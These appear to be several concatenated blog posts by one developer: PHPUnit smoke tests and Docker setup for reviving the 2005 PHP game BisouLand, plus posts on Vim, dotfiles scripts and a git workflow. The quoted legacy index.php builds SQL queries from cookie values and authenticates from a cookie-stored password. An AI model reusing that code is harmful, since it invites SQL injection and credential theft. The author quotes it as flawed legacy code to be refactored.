# Mount the monolith source code for analysis
- ../monolith:/apps/monolith
networks:
- default
- skyswoon-monolith_default
networks:
skyswoon-monolith_default:
external: true
This allows us to have QA in its own container (with PHP 8.4) that can still communicate with the monolith container, so we can issue curl requests or query the MySQL database.
It also gives us access to the monolith source files, so we can run tooling on them, like PHPStan, Rector, PHP CS Fixer, etc.
There are two kinds of tests that I hate (this is coming from a Test Driven Development practitioner, btw!) and one of them is Smoke Tests.
Those basically issue a curl request
and only check the bare minimum, such as whether the status code is 200.
I don't like these because they are slow (remote requests),
unreliable (errors like failed form validation, page not found, etc. will still return 200),
and overall don't provide much value.
However in this specific case I still think Smoke Tests can help us, notably to make a list of what pages the website has, and also differentiate the ones that are public, and the ones that should only be accessed by logged in players.
This will be valuable knowledge, and once we have better test coverage we can get rid of those.
After manually navigating the website, checking the pages.php file,
and overall getting familiar with the app,
I've documented my findings in a data provider in the following Smoke Test,
which checks if all private pages are accessible to logged in players,
but not for logged out visitors:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Smoke;
use Bl\Qa\Tests\Infrastructure\Scenario\GetLoggedInPlayer;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use Bl\Qa\Tests\Smoke\Assertion\Assert;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\Attributes\Large;
use PHPUnit\Framework\Attributes\TestDox;
use PHPUnit\Framework\TestCase;
#[CoversNothing]
#[Large]
final class PlayerPagesTest extends TestCase
{
#[TestDox('it blocks $pageName page (`$url`) for visitors')]
#[DataProvider('playerPagesProvider')]
public function test_it_blocks_player_page_for_visitors(string $url, string $pageName): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$response = $httpClient->request('GET', $url);
Assert::blocksPageForLoggedOutVisitors($response);
}
#[TestDox('it loads $pageName page (`$url`) for logged in players')]
#[DataProvider('playerPagesProvider')]
public function test_it_loads_player_page_for_logged_in_players(string $url, string $pageName): void
{
$httpClient = TestKernelSingleton::get()->httpClient();
$loggedInPlayer = GetLoggedInPlayer::run();
$response = $httpClient->request('GET', $url, [
'headers' => [
'Cookie' => $loggedInPlayer->sessionCookie,
],
]);
Assert::loadsPageForLoggedInPlayers($response);
}
/**
* @return array<array{string, string}>
*/
public static function playerPagesProvider(): array
{
return [
['/connected.html', 'account'],
['/action.html', 'blow kisses'],
['/cerveau.html', 'brain'],
['/changepass.html', 'change password'],
['/nuage.html', 'clouds'],
['/yeux.html', 'eyes'],
['/boite.html', 'inbox'],
['/bisous.html', 'kisses'],
['/construction.html', 'organs'],
['/infos.html', 'reference'],
['/techno.html', 'techniques'],
['/lire.html', 'view message'],
];
}
}
Running this test should output the following:
> make test arg='--testdox --filter PlayerPages'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.11
Configuration: /apps/qa/phpunit.xml.dist
........................ 24 / 24 (100%)
Time: 00:00.606, Memory: 18.00 MB
Player Pages (Bl\Qa\Tests\Smoke\PlayerPages)
✔ it blocks organs page (`/construction.html`) for visitors
✔ it blocks account page (`/connected.html`) for visitors
✔ it blocks reference page (`/infos.html`) for visitors
✔ it blocks kisses page (`/bisous.html`) for visitors
✔ it blocks brain page (`/cerveau.html`) for visitors
✔ it blocks change·password page (`/changepass.html`) for visitors
✔ it blocks eyes page (`/yeux.html`) for visitors
✔ it blocks view·message page (`/lire.html`) for visitors
✔ it blocks clouds page (`/nuage.html`) for visitors
✔ it blocks inbox page (`/boite.html`) for visitors
✔ it blocks techniques page (`/techno.html`) for visitors
✔ it blocks blow·kisses page (`/action.html`) for visitors
✔ it loads view·message page (`/lire.html`) for logged in players
✔ it loads eyes page (`/yeux.html`) for logged in players
✔ it loads brain page (`/cerveau.html`) for logged in players
✔ it loads change·password page (`/changepass.html`) for logged in players
✔ it loads techniques page (`/techno.html`) for logged in players
✔ it loads account page (`/connected.html`) for logged in players
✔ it loads reference page (`/infos.html`) for logged in players
✔ it loads inbox page (`/boite.html`) for logged in players
✔ it loads kisses page (`/bisous.html`) for logged in players
✔ it loads organs page (`/construction.html`) for logged in players
✔ it loads clouds page (`/nuage.html`) for logged in players
✔ it loads blow·kisses page (`/action.html`) for logged in players
OK (24 tests, 24 assertions)
🔗 Check: PHPUnit Best Practices
The test is structured as follows: shared infrastructure lives in a TestKernelSingleton, and reusable steps are extracted into "Scenario" classes (SignUpNewPlayer, LogInPlayer, etc.).
To be able to see if a page is blocked for a non-logged-in visitor, we cannot just rely on the HTTP status (it will always be 200), so we instead have to check for error messages contained in the page.
Through my exploration, I've discovered that various messages get displayed when a logged out visitor tries to access a private page. I've documented this in the following custom assertion:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Smoke\Assertion;
use PHPUnit\Framework\Assert as PHPUnitAssert;
use Symfony\Contracts\HttpClient\ResponseInterface;
final readonly class Assert
{
private const array NOT_LOGGED_IN_MESSAGES = [
// Warning: side bar contains `Tu n'es pas connecté.`
'standard' => 'es pas connecté !!',
'variant 1 (inbox)' => 'es pas connecté !!',
'variant 2 (kisses, organs, techniques, account)' => 'Veuillez vous connecter.',
'variant 3 (reference)' => 'Erreur... et vouaip !! :D',
];
public static function blocksPageForLoggedOutVisitors(ResponseInterface $response): void
{
$content = (string) $response->getContent();
foreach (self::NOT_LOGGED_IN_MESSAGES as $message) {
if (str_contains($content, $message)) {
PHPUnitAssert::assertSame(200, $response->getStatusCode(), $content);
return;
}
}
PHPUnitAssert::fail('Failed asserting that Page is blocked for logged out visitors');
}
public static function loadsPageForLoggedInPlayers(ResponseInterface $response): void
{
$content = (string) $response->getContent();
foreach (self::NOT_LOGGED_IN_MESSAGES as $message) {
if (str_contains($content, $message)) {
PHPUnitAssert::fail('Failed asserting that Page loads for logged in players');
}
}
PHPUnitAssert::assertSame(200, $response->getStatusCode(), $content);
}
}
For some of our tests, we need to have a visitor to first sign up as a player, which I've done through the following "Scenario" class:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
final readonly class SignUpNewPlayer
{
public static function run(
string $username = 'BisouTest',
string $password = 'password',
string $passwordConfirmation = 'password',
): Player {
$httpClient = TestKernelSingleton::get()->httpClient();
if ('BisouTest' === $username) {
$username = substr('BisouTest_'.uniqid(), 0, 15);
}
$httpClient->request('POST', '/inscription.html', [
'body' => [
'Ipseudo' => $username,
'Imdp' => $password,
'Imdp2' => $passwordConfirmation,
'inscription' => "S'inscrire",
],
'headers' => [
'Content-Type' => 'application/x-www-form-urlencoded',
],
]);
return new Player($username, $password);
}
}
Here we do an HTTP request that simulates posting the HTML form. An alternative would have been to run a SQL query that creates the player directly in the database, but we would risk missing other insertions that might be required.
The advantage of the current approach is that it also smoke tests the signup form.
We also need the player to be logged in:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use Symfony\Component\HttpClient\Exception\RedirectionException;
final readonly class LogInPlayer
{
public static function run(Player $player): string
{
$httpClient = TestKernelSingleton::get()->httpClient();
try {
$response = $httpClient->request('POST', '/redirect.php', [
'body' => [
'pseudo' => $player->username,
'mdp' => $player->password,
'connexion' => 'Se connecter',
],
'headers' => [
'Content-Type' => 'application/x-www-form-urlencoded',
],
'max_redirects' => 0,
]);
} catch (RedirectionException $e) { // @phpstan-ignore catch.neverThrown
// With max_redirects=0, HttpClient throws an exception when we get a 302
// This is expected on successful login
$response = $e->getResponse();
}
$headers = $response->getHeaders(false);
$cookies = $headers['set-cookie'] ?? $headers['Set-Cookie'] ?? [];
foreach ($cookies as $cookie) {
if (str_starts_with($cookie, 'PHPSESSID=')) {
return $cookie;
}
}
$content = $response->getContent(false);
$allCookies = implode(', ', $cookies);
throw new \RuntimeException("Login failed: PHPSESSID cookie not found. Cookies: [{$allCookies}], Content: {$content}");
}
}
Similarly to the SignUpNewPlayer scenario,
LogInPlayer posts an HTTP request that simulates the login form.
To be able to then act as the logged-in player, we need their session cookie string, so we make sure to return it.
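The cookie hunt boils down to prefix matching on the Set-Cookie headers. The same logic can be sketched in shell (the header value below is made up for the demo):

```shell
# Hypothetical Set-Cookie value, shaped like the one returned on login
header='PHPSESSID=abc123def; path=/; HttpOnly'
cookie=''
case "$header" in
  # Same check as str_starts_with($cookie, 'PHPSESSID=')
  PHPSESSID=*) cookie=$header ;;
esac
echo "$cookie"
```

Any other cookie (analytics, CSRF, etc) is simply skipped by the prefix check.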
Finally, the GetLoggedInPlayer scenario signs up and logs in a player once,
then always returns that same instance, to save us some overhead in the test suite:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
final class GetLoggedInPlayer
{
private static ?LoggedInPlayer $loggedInPlayer = null;
public static function run(): LoggedInPlayer
{
if (null === self::$loggedInPlayer) {
$player = SignUpNewPlayer::run();
$sessionCookie = LogInPlayer::run($player);
self::$loggedInPlayer = new LoggedInPlayer($player->username, $player->password, $sessionCookie);
}
return self::$loggedInPlayer;
}
}
These scenarios will come in handy when we start writing other kinds of tests.
💻 Source code:
Now we can type:
make test arg='--testdox --filter PlayerPages'
And get the list of all public and private pages.
⁉️ What do you mean, "tests are failing"??
🤘 From the abyssal depths of forgotten servers, Docker the Void-Walker awakens to drag ancient LAMP stack from their tombs, wrapping them in the obsidian chains of containerization! 🔥
Back in 2005, I learned how to write Linux/Apache/MySQL/PHP websites thanks to the Site du Zero (SdZ), which is now known as Open Classrooms.
I also used to play a web-browser game, similar to OGame, called BisouLand (SkySwoon). Turns out its creator also built it through SdZ tutorials!
Fast forward 20 years later (today), I received a message on LinkedIn from a CTO asking me the following:
💬 "Are you willing to work with eXtreme Legacy code on occasion?"
I wondered to myself: what is eXtreme Legacy code? And I immediately remembered BisouLand.
You see, back in 2011, its creator had made it Open Source on GitHub and made me a code collaborator...
So I do have access to a 2005 LAMP stack website, cobbled together by someone learning stuff on the go from the internet.
What would it take, in 2025, to get an eXtreme Legacy app up and running?
This is what we're going to find out in this series.
Today's first article is about getting it to run, at least locally.
Version 1 has the following directory tree:
web/
├── .htaccess
├── checkConnect.php
├── deconnexion.php
├── favicon.ico
├── images/
├── includes/
│ ├── bisouStyle2.css
│ ├── compteur.js
│ ├── newbisouStyle2.css
│ └── prev.js
├── index.php
├── phpincludes/
│ ├── accueil.php
│ ├── action.php
│ ├── aide.php
│ ├── attaque.php
│ ├── bd.php
│ ├── bisous.php
│ ├── confirmation.php
│ ├── connected.php
│ ├── connexion.php
│ ├── erreur404.php
│ ├── evo.php
│ ├── fctIndex.php
│ ├── nuage.php
│ ├── ...
│ ├── pages.php
│ └── yeux.php
└── redirect.php
The .htaccess file contains URL rewrite rules for Apache:
RewriteEngine on
RewriteRule (.+)\.confirmation\.html$ /index.php?page=confirmation&id=$1
RewriteRule (.+)\.bisous\.html$ /index.php?page=bisous&cancel=$1
RewriteRule (.+)\.(.+)\.nuage\.html$ /index.php?page=nuage&saut=1&sautnuage=$1&sautposition=$2
RewriteRule (.+)\.nuage\.html$ /index.php?page=nuage&nuage=$1
RewriteRule (.+)\.(.+)\.action\.html$ /index.php?page=action&nuage=$1&position=$2
RewriteRule (.+)\.(.+)\.yeux\.html$ /index.php?page=yeux&Dnuage=$1&Dpos=$2
RewriteRule (.+)\.html$ /index.php?page=$1
ErrorDocument 404 /erreur404.html
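To make these rules concrete, here's the first one applied by hand with sed (the URL is a made-up example; Apache's actual matching is done by mod_rewrite, this merely mirrors the regex):

```shell
# The (.+)\.confirmation\.html rule, replayed with sed -E;
# '\&' escapes sed's special replacement character
url='42.confirmation.html'
rewritten=$(echo "$url" | sed -E 's#(.+)\.confirmation\.html$#/index.php?page=confirmation\&id=\1#')
echo "$rewritten"
```

So a visitor requesting `42.confirmation.html` is actually served by `index.php` with `page=confirmation` and `id=42`.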
There is no database schema, but a quick scan of the files reveals the use
of MySQL, for example in web/phpincludes/bd.php:
<?php
function bd_connect() {
mysql_pconnect("HOST", "USER", "PASSWORD");
mysql_select_db("DATABASE");
}
As for the code architecture, the file web/index.php acts as a
front controller that displays the layout of the website, and then includes
a file from web/phpincludes/ for the actual page content.
The HTML is mixed with the MySQL queries, session management, game logic and any other PHP code. Code and comments are written in French, and there are several encoding issues.
Here's an extract from web/index.php:
<?php
header('Content-type: text/html; charset=ISO-8859-1');
session_start();
ob_start();
include 'phpincludes/bd.php';
bd_connect();
include('phpincludes/fctIndex.php');
//Si la variable $_SESSION['logged'] n'existe pas, on la créée, et on l'initialise a false
if (!isset($_SESSION['logged'])) $_SESSION['logged'] = false;
//Si on est pas connecté.
if ($_SESSION['logged'] == false)
{
$id=0;
//On récupère les cookies enregistrés chez l'utilisateurs, s'ils sont la.
if (isset($_COOKIE['pseudo']) && isset($_COOKIE['mdp']))
{
$pseudo = htmlentities(addslashes($_COOKIE['pseudo']));
$mdp = htmlentities(addslashes($_COOKIE['mdp']));
//La requête qui compte le nombre de pseudos
$sql = mysql_query("SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo='".$pseudo."'");
if (mysql_result($sql,0,'nb_pseudo') != 0)
{
//Sélection des informations.
$sql_info = mysql_query("SELECT id, confirmation, mdp, nuage FROM membres WHERE pseudo='".$pseudo."'");
$donnees_info = mysql_fetch_assoc($sql_info);
//Si le mot de passe est le même (le mot de passe est déjà crypté).
if ($donnees_info['mdp'] == $mdp)
{
//Si le compte est confirmé.
if ($donnees_info['confirmation'] == 1)
{
//On modifie la variable qui nous indique que le membre est connecté.
$_SESSION['logged'] = true;
$page='cerveau';
}
}
}
}
}
if ($_SESSION['logged'] == true)
{
//l'id du membre.
$id=$_SESSION['id'];
//Fonction destinée à l'administration
if (isset($_POST['UnAct']) && $id==12)
{
actionAdmin();
}
$sql_info = mysql_query(
"SELECT timestamp, coeur, bouche, amour, jambes, smack, baiser, pelle, tech1, tech2, tech3, tech4, dent, langue, bloque, soupe, oeil"
." FROM membres WHERE id='".$id."'"
);
$donnees_info = mysql_fetch_assoc($sql_info);
//On récupère le nombre de points d'amour.
$amour = $donnees_info['amour'];
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" media="screen" type="text/css" title="bisouStyle2" href="includes/bisouStyle2.css" />
<link rel="shorcut icon" href="http://bisouland.piwai.info/favicon.ico"/>
<meta http-equiv="Content-Language" content="fr" />
</head>
<body>
<div id="speedbarre">
<?php if ($_SESSION['logged'] == true)
{?>
<?php echo formaterNombre(floor($amour)); ?>
<?php
}
else
{
?>
<a href="connexion.html">Connexion</a>
<?php } ?>
</div>
<div id="corps">
<?php
include('phpincludes/pages.php');
if (isset($array_pages[$page]))
{
include('phpincludes/'.$array_pages[$page]);
}
else
{
include('phpincludes/erreur404.php');
}
?>
</div>
</body>
</html>
😵
In addition to the spaghetti code, we can immediately spot security issues. But we cannot fix anything until we can manually test the website, so how do we get it to run?
Back in 2005, the most common versions of the LAMP stack were:
Applications written for MySQL 4.0 and PHP 4.3 can run on versions up to MySQL 5.7 and PHP 5.6. Some deprecation notices will be issued, but in terms of backward compatibility, that's how far we can stretch things.
So let's create a Dockerfile that will have Apache 2, PHP 5.6 and MySQL 5.7:
# syntax=docker/dockerfile:1
FROM php:5.6-apache
# Update sources.list to use archive repositories for Debian Stretch
RUN sed -i 's/deb.debian.org/archive.debian.org/g' /etc/apt/sources.list \
&& sed -i 's/security.debian.org/archive.debian.org/g' /etc/apt/sources.list \
&& sed -i '/stretch-updates/d' /etc/apt/sources.list
# Install system dependencies and PHP extensions in single layer
RUN docker-php-ext-install mysql \
&& a2enmod rewrite
# Set working directory
WORKDIR /var/www/html
# Copy application files with proper ownership
COPY --chown=www-data:www-data web/ /var/www/html/
With the following compose.yaml, we'll set up the Apache and MySQL servers:
name: skyswoon-monolith
services:
web:
build: .
ports:
- "8080:80"
volumes:
- ./web:/var/www/html
depends_on:
- db
environment:
DATABASE_HOST: ${DATABASE_HOST}
DATABASE_USER: ${DATABASE_USER}
DATABASE_PASSWORD: ${DATABASE_PASSWORD}
DATABASE_NAME: ${DATABASE_NAME}
restart: unless-stopped
db:
image: mysql:5.7
platform: linux/amd64
environment:
MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD}
MYSQL_DATABASE: ${DATABASE_NAME}
MYSQL_USER: ${DATABASE_USER}
MYSQL_PASSWORD: ${DATABASE_PASSWORD}
volumes:
- mysql_data:/var/lib/mysql
ports:
- "127.0.0.1:3306:3306"
restart: unless-stopped
volumes:
mysql_data:
You might notice that I've mentioned some environment variables,
to configure the database. These will need to be set in a .env file:
# Database
DATABASE_HOST=db
DATABASE_USER=database_user
DATABASE_PASSWORD=database_password
DATABASE_NAME=database_name
# MySQL root password (for Docker)
MYSQL_ROOT_PASSWORD=mysql_root_password
When docker compose up is run,
Docker Compose automatically reads .env and sets the environment variables;
PHP then copies these into the $_ENV superglobal,
so we can read the values like so in web/phpincludes/bd.php:
<?php
function bd_connect()
{
mysql_pconnect(
$_ENV['DATABASE_HOST'],
$_ENV['DATABASE_USER'],
$_ENV['DATABASE_PASSWORD']
);
mysql_select_db($_ENV['DATABASE_NAME']);
}
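For the curious, Compose's .env handling can be approximated in plain shell (a simplification: Compose has its own parser and doesn't literally source the file):

```shell
# Simplified stand-in for Compose's .env handling: export each KEY=value
# line so that child processes (here, the PHP container) inherit them
envfile=$(mktemp)
printf 'DATABASE_HOST=db\nDATABASE_USER=database_user\n' > "$envfile"
set -a          # auto-export every assignment that follows
. "$envfile"
set +a
echo "$DATABASE_HOST"
```

This is why the values typed once into .env end up visible in `$_ENV` inside the container.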
Last but not least, I'm adding a Makefile to avoid having to type long
docker compose build; docker compose up commands: see the file on GitHub.
Super Secret Tip: I've written about My Symfony Dockerfile, and My Symfony Makefile.
💻 Source code:

And we did it! Now, by typing:
make build; make up
We get BisouLand running live, 20 years after its conception.
You can visit it there: http://localhost:8080/accueil.html.
⁉️ What do you mean, "it doesn't work"?? It works on my machine!
The keyboards leak molten steel, as Vim motions carve runes through silicon, the code prostrates itself before the LSP's omniscient eye:
phpactor descends as the shape-shifting overlord who bends variables and transmutes classes into monuments of perfect refactors.
XDebug breakpoints become lightning-riders galloping through Vim buffers.
In this article, I'll discuss why Vim is my favourite IDE (not test/code editor, no, fully fledged IDE).
I started my programming journey in 2004 on Smultron: I was told the go-to app was Notepad++, but my parents had a Mac.
When I migrated to Ubuntu in 2006, I simply switched to Gedit. I remember learning vi at the time, just to be able to do things while ssh-ing onto remote servers.
It was at University, in 2008, that I started to use a proper IDE: Emacs, which was mandatory for all students. I didn't mind though as I was happy to level up my geekiness, and by that time I was developing a strong preference for the terminal.
But during my multiple internships and apprenticeships, I was told that professionals used proper IDEs, and was made to use Eclipse and NetBeans.
I have to say I was never impressed with the lack of responsiveness from these tools.
When I started to work at SensioLabs in 2013, frustrated with how slow these IDEs were, I switched to Sublime Text.
When I moved to the UK in 2014 and started to work for the startup Constant.Co, I continued to use Sublime Text, to my colleague's amusement.
In 2015, Adam, who'd become our VP of Engineering, joined and we had a lot of extremely interesting conversations. One of the many things he told me, which stuck with me, regarding Text / Code Editors versus IDEs was:
It's not the tool that matters, it's how well you learn, understand and use it.
This is when I decided to drop Sublime Text. And use Vim instead.
Before I talk more about Vim, I want to mention that after joining Telum Media in 2024, I was made to use PhpStorm as it was mandatory. Same policy when I joined Bumble in 2025.
In terms of preference, the terminal has always taken precedence over the Graphical User Interface for me, and I tend to favour using the keyboard (and shortcuts) over the mouse and gestures.
In retrospect, I think there's also a lot of noise that comes with the default interface of Eclipse, NetBeans and PhpStorm, which I personally find distracting.
So I considered the two options in front of me: Emacs or Vim? After finding out that Vim motions were supported in other IDEs, I made my choice.
Why don't you use a proper IDE?
This is a question I often get when I mention I use Vim.
A "proper" IDE provides:
By integrating Vim with LSP we get all the features listed above.
Another important feature of IDEs is:
As it turns out, it's also possible to integrate Vim with those (eg xdebug).
Other integrations, which some might add to the list of important things, are:
These are also possible, but I personally much prefer to use the tools for these directly from the terminal.
So. Can anyone let me know what I'm missing out on with Vim, that I'd be getting from "proper" IDEs?
Perhaps the biggest argument in favour of Vim would be the Motions:
- h, j, k, l: move one character Left, Down, Up, Right (LDUR)
- 0, ^, $: move to the first character of the line, first non-whitespace character, last character
- f{char}, t{char}: move to the next occurrence of a character in the line, onto the character or just before it

They can be Composed with operators:

- d: delete
- y: yank, aka copy
- p: paste
- c: change

For more Precision, Text Objects can be used:

- w: a word
- s: a sentence
- p: a paragraph

Here are a couple of examples:

- dt;: delete, until, character ;: cuts everything before the semicolon
- ci': change, inside, single quotes: replaces the text inside single quotes (works with double quotes, parentheses, curly braces, etc)

Making one's changes repeatable will unleash even more power:

- d23d: delete 23 lines
- .: replay the previous action
- qa: record keystrokes into register a
- @a: replay the keystrokes from register a

While there is a lot to learn, I'd say the Vim motions aren't too difficult to memorize since they are mnemonic as much as possible.
They also have some logic in terms of direction: lowercase is forward
(yf: copy from cursor to next space, space included) and uppercase is backward
(yF: copy from cursor to previous space, space included).
But I can attest that there's a lot to learn, and it's easy to plateau. I've personally stuck with a small subset of these for a decade, and have only decided this year (2025) to learn more (macros are AMAZING).
When I was mandated to use PhpStorm at Telum Media in 2024, I decided to give it a fair chance and use it exactly as intended. But I wasn't convinced I gained any efficiency compared to Vim.
When the same requirement came up at Bumble in 2025, I took a different approach: minimalistic UI, Vim motions enabled (though support isn't perfect: I experienced issues with macros, for example).
This compromise will likely be my path forward: use Vim when possible, and configure whatever I'm required to use to feel as Vim-like as possible.
The broader lesson? Unless there's a compelling reason, forcing developers away from tools they've mastered is counterproductive.
Listen to Adam's wise advice: deep knowledge of one's workflow, getting proficient with one's tools and seeking improvement matter more than whatever software happens to be the most popular.
My dotfiles repository is how I back up, restore and synchronise my shell / system preferences and settings.
I felt the need to do so back in 2014, when I had 3 computers (personal desktop, personal laptop and work laptop) and wanted to keep the same config across the different devices.
I now have one single device, yet this has proven very useful over the years, especially any time I upgraded to a new device.
A decade ago, I tried my best to come up with a system that would:
I'm happy to report I was successful in this, and I was even able to add cross-platform compatibility (macOS) in 2025.
The configuration files for most UNIX tools usually start with a dot (.),
hence the name "dot files".
Examples of such files are:
- .bashrc, configuring the bash shell
- .vimrc, setting up the powerful IDE
- .gitconfig, instructing git about your personal preferences

It's only this year that I started researching solutions on how to manage dotfiles, in order to add support for macOS. There are so many tools:
I got really interested in Ansible, which promised to set up my computers in an automated way.
But then I realised the configuration files were far longer than an equivalent simple bash script would be. I also didn't like the idea of having to learn, and maintain knowledge of, yet another tool.
So in the end I decided to stick with what I had set up. And cross platform compatibility turned out to be a breeze to implement!
My dotfile repository follows this file tree structure:
.
├── <xy>-<package>/
│ ├── _<package-manager>.sh
│ ├── config/
│ ├── install.sh
│ └── README.md
└── install.sh
The root install.sh script just iterates through the package
subdirectories; it finds the local install.sh in each and executes it.
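That root script isn't reproduced here, but its shape is roughly this (a sketch with made-up package names, not the actual file):

```shell
# Sketch of the root install.sh: loop over the numbered package
# directories, in lexical order (hence the numeric prefixes), and
# run each package's local install.sh
demo=$(mktemp -d)
mkdir -p "$demo/12-bash" "$demo/21-git"
echo 'echo installing bash' > "$demo/12-bash/install.sh"
echo 'echo installing git'  > "$demo/21-git/install.sh"
cd "$demo"
out=$(for package_dir in [0-9][0-9]-*/; do
  [ -f "${package_dir}install.sh" ] && bash "${package_dir}install.sh"
done)
echo "$out"
```

The numeric prefixes double as an ordering mechanism: low numbers (shells, package managers) install before the packages that depend on them.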
Examples of packages I have there are:
.
├── 12-bash/
├── 13-curl/
├── 14-less/
├── 21-git/
├── 22-php/
├── 23-vim/
├── 24-tree/
└── 25-ack/
As for an example of what the inside of a package sub directory looks like:
12-bash/
├── _apt.sh
├── _brew.sh
├── config/
│ ├── bashrc
│ ├── prompt.sh
│ └── shopt.sh
├── install.sh
└── README.md
The role of the package's install.sh script is to:
- call the _<package-manager>.sh script (apt for Ubuntu, brew for macOS)
- create symbolic links for the config files, in ~/.config

For instance, here's the install.sh for bash:
#!/usr/bin/env bash
# File: /12-bash/install.sh
# ──────────────────────────────────────────────────────────────────────────────
# 💲 bash - GNU Bourne-Again SHell
# ──────────────────────────────────────────────────────────────────────────────
_SSDF_PACKAGE_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]:-$0}")")"
SSDF_ROOT_DIR="$(realpath "${_SSDF_PACKAGE_DIR}/..")"
source "${SSDF_ROOT_DIR}/00-_ssdf/functions.sh"
_SSDF_PACKAGE_NAME="bash"
_ssdf_echo_section_title "Installing ${_SSDF_PACKAGE_NAME}..."
## ─────────────────────────────────────────────────────────────────────────────
## 📦 Call to `./_<package-manager>.sh` script.
## ─────────────────────────────────────────────────────────────────────────────
_ssdf_select_package_manager
_ssdf_install_with_package_manager "${_SSDF_PACKAGE_DIR}" "${SSDF_PACKAGE_MANAGER}"
## ─────────────────────────────────────────────────────────────────────────────
## 🔗 Symbolic links.
## ─────────────────────────────────────────────────────────────────────────────
mkdir -p "${HOME}/.config/bash"
cp -i "${_SSDF_PACKAGE_DIR}/config/bashrc" "${HOME}/.bashrc"
ln -nsf "${_SSDF_PACKAGE_DIR}/config/prompt.sh" "${HOME}/.config/bash/prompt.sh"
ln -nsf "${_SSDF_PACKAGE_DIR}/config/shopt.sh" "${HOME}/.config/bash/shopt.sh"
## ─────────────────────────────────────────────────────────────────────────────
## ➕ Additional config / install
## ─────────────────────────────────────────────────────────────────────────────
if [ -e "${HOME}/.bashrc" ]; then
_ssdf_append_source \
"${HOME}/.bashrc" \
"${HOME}/.config/shell/common.sh"
_ssdf_append_source \
"${HOME}/.config/shell/prompt.local.sh" \
"${HOME}/.config/bash/prompt.sh"
fi
_ssdf_echo_success "${_SSDF_PACKAGE_NAME} installed"
## ─────────────────────────────────────────────────────────────────────────────
## 🧹 Cleaning up local variables
## ─────────────────────────────────────────────────────────────────────────────
_ssdf_unset_envvars
Note: Nothing you need to know or do in this section. But for the curious, here goes nothing!
Initially the scripts used commands and bash syntax directly, but in 2025, with the need for cross-platform compatibility, I decided to create a set of helper functions: they can be found in the ssdf directory (SSDF stands for Super Secret DotFiles).
Inside, we can find helpful documentation:
We can also find some cross platform scripts (sed and grep <x> | sed).
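As an illustration of the kind of portability wrapper involved (a sketch, not the actual SSDF helper): GNU sed and BSD/macOS sed disagree on in-place editing flags (`-i` vs `-i ''`), which writing to a temp file sidesteps entirely:

```shell
# Portable in-place sed: avoid the GNU/BSD -i incompatibility by
# writing to a temp file and moving it back over the original
_sed_inplace() {
  sed "$1" "$2" > "$2.tmp" && mv "$2.tmp" "$2"
}
f=$(mktemp)
printf 'colour\n' > "$f"
_sed_inplace 's/colour/color/' "$f"
result=$(cat "$f")
echo "$result"
```

The same wrap-the-difference approach works for grep, date, and the other utilities whose flags diverge between Linux and macOS.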
And we can find some functions which I use in the different scripts:
- _ssdf_prepend_path "${HOME}/bin" "${HOME}/.local/bin":
  Prepends bin and .local/bin to PATH, if they exist and aren't already added
- _ssdf_append_envvar ~/.config/shell/envvars.local.sh "ACKRC" "${HOME}/.config/ack/ackrc":
  Appends the ACKRC variable, set to ~/.config/ack/ackrc, to ~/.config/shell/envvars.local.sh
- _ssdf_unset_envvars:
  🗑️ Garbage Collectooooooooooooor~ 🎶🤘

Last but not least, the quarry (of Creation) folder is a repository of Blocks:
reusable templates that help bootstrap or extend packages.
Let's say I want to add settings for a new package (eg Nerd Fonts), then I'll run:
_SSDF_INPUT_PACKAGE_ID='31' \
_SSDF_INPUT_PACKAGE_NAME='nerd-fonts' \
_SSDF_INPUT_PACKAGE_EMOJI='🤓' \
_SSDF_INPUT_PACKAGE_TITLE='Nerd Fonts' \
_SSDF_INPUT_PACKAGE_SHORT_DESCRIPTION='Iconic font aggregator, collection, and patcher.' \
bash ~/.dotfiles/00-_ssdf/quarry/0a01-new-package/1.0/install.sh
And badabim, badaboom, there's now a 31-nerd-fonts folder with skeleton scripts
and a bootstrapped README.md.
Fun fact, 00-_ssdf/quarry/0a00-new-quarry-block was used to bootstrap 00-_ssdf/quarry/0a01-new-package.
This whole Quarry of Creation concept is a thing I've been toying with, I'll probably write more about it in the future so stay tuned!
To sum up, I use a git repository to back up my shell settings, so I can share them across many devices.
And I also use some plain and simple bash scripts to restore and install them.
This might seem like a lot, but it's been suiting me well for the past decade. I hope this can inspire you to build something of your own!
TL;DR:
- git checkout -b FEAT-4423-my-feature from main
- git rebase main to update
- git merge --no-ff feature back in main

Wield the crimson blade of version control, where every commit carves your legacy into the eternal codex of time.
I wrote about my git workflow back in 2014, which really was just @jbenet's 2013 simple git branching model.
I very much like this workflow as I still use it, a decade after!
In this article, we'll explore some of the subtleties I've discovered along the way.
Whenever a change (feature, bug fix, etc) needs to be made,
create a new branch from an up-to-date main:
# Update main
git checkout main
git pull --rebase
# Create new branch
git checkout -b FEAT-4423-my-feature
Super Secret Tip 1: establish a direct relationship between code modifications and project tasks, by including the Ticket ID in your branch name. This will allow:
- Automated Integration: like linking the branch, its commits, and its Pull Request to the ticket, enabling synchronisation between the ticket and the pull request status, as well as deployment
- Traceability and Context: trace any code change back to its original purpose, which can be helpful when debugging some issues in the future
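Tooling can then lean on this convention; for instance, extracting the Ticket ID from a branch name (hypothetical branch name below; in a real checkout you'd read it with git rev-parse --abbrev-ref HEAD):

```shell
# Derive the Ticket ID from the branch-naming convention TICKET-123-slug
branch='FEAT-4423-my-feature'
ticket=$(printf '%s\n' "$branch" | grep -oE '^[A-Z]+-[0-9]+')
echo "$ticket"
```

This is essentially what the "Automated Integration" above relies on: the ticket tracker parses the same prefix out of branch and PR names.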
Update your branch often with the changes in main:
# Update remote main
git fetch origin
# Get latest main changes
